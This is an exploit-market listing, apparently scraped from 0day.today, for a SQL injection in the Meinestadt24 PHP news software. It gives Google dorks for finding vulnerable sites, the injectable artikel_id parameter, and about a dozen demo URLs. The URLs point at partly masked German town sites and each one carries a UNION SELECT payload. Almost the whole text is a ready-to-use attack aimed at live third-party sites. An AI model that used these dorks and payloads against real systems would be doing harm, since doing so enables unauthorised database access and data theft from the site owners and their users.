[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Meinestadt24 SQL Injection Vulnerability

Author
Ashiyane
Risk
[
Security Risk High
]
0day-ID
0day-ID-23933
Category
web applications
Date add
26-07-2015
Platform
php
[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]

Exploit Title : Meinestadt24 SQL Injection Vulnerability

Exploit Author : Ashiyane Digital Security Team

Google Dork One : intext:© 2015 meinestadt24
Google Dork Two : inurl:nachrichten.php?artikel_id=

Date : 2015-7-25

Tested On : Windows Se7en

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]

Path Of Vulnerability :

http://Target.de/nachrichten.php?artikel_id=-AnyNumber [SQLI]

* Reminder : Your Sqli Command Needs UrlEncode

[-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-][-]
Demos :

http://www.meiXgriesheim.de/nachrichten.php?artikel_id=-983722 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meiXeckarsulm.de/nachrichten.php?artikel_id=-990952 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meinXnsberg.de/nachrichten.php?artikel_id=-293312 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meXberbach.de/nachrichten.php?artikel_id=-991321 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meXschaffenburg.de/nachrichten.php?artikel_id=-74847 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meXarmstadt.de/nachrichten.php?artikel_id=-996681 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meXabenhausen.de/nachrichten.php?artikel_id=-992823 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.meXkarlsruhe.de/nachrichten.php?artikel_id=-88747 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.mein-Xchenzell.de/nachrichten.php?artikel_id=-46129 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.mXbebra.de/nachrichten.php?artikel_id=-981361 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

http://www.mein-Xrsch.de/nachrichten.php?artikel_id=-987491 UNION SELECT 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ##

And many more ...

#  0day.today [2024-12-26]  #